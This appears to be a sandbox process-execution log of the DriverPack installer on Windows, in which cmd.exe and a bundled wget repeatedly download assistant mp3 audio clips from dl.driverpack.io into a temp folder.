"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROTECT-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44817.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_44817.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROTECT-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_7695.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROTECT-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_99287.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-PROTECT-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44817.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6344.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_6344.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_98424.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_98424.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_60530.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_60530.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_84953.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_84953.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_27797.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_27797.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "599518434-869109847-760374141168091449-507524943912119548924734494538188149"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_98424.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_84953.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_60530.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6344.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-5.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_27797.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_18364.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_18364.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-DIAGNOSTICS-6.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_18364.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-CONFIGURATOR-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_56826.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_56826.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-CONFIGURATOR-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_19176.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_19176.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-CONFIGURATOR-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_68644.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_68644.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-CONFIGURATOR-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_68644.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-CONFIGURATOR-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_19176.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-CONFIGURATOR-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_56826.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-SETTINGS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_72039.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_72039.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/EXPERT-SETTINGS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_72039.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_95816.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_95816.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_70297.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_70297.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44777.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_44777.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_70297.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_95816.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/TEAM-PROOF-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_44777.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_95128.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_95128.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_4255.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_4255.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_23978.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_23978.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_23978.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_4255.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/CONTINUOUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_95128.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_22320.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_22320.txt""

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "648485856-2123017844-1499822332-1129604748-1433721955144268136112267703381265292767"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_62048.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_62048.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_20194.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_20194.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_22320.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_20194.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ANTIVIRUS-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_62048.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/COMPILATION-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_50487.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_50487.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/COMPILATION-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6227.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_6227.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/COMPILATION-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_55196.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_55196.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/COMPILATION-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_50487.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/COMPILATION-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_6227.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/COMPILATION-3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_55196.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/SERVICE_MODE-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_41503.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_41503.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/SERVICE_MODE-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_31537.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_31537.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/SERVICE_MODE-1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_41503.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/SERVICE_MODE-2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_31537.log"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_99698.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_99698.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43844.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_43844.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_24933.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_24933.txt""

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51078.log" & echo DONE > "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_finished_51078.txt""

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_4.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_51078.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_2.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_43844.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_3.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_24933.log"

C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\tools\driverpack-wget.exe

"tools\driverpack-wget.exe" --tries=3 --timeout 5 --retry-connrefused --wait=5 --timestamping --directory-prefix="C:\Users\Admin\AppData\Local\Temp\beetle-cab\DriverPack\audio\en" "http://dl.driverpack.io/assistant/beetle/audio/en/ISTART_1.mp3" -o "C:\Users\Admin\AppData\Roaming\DRPSu\temp\wget_log_99698.log"

C:\Windows\SysWOW64\cmd.exe

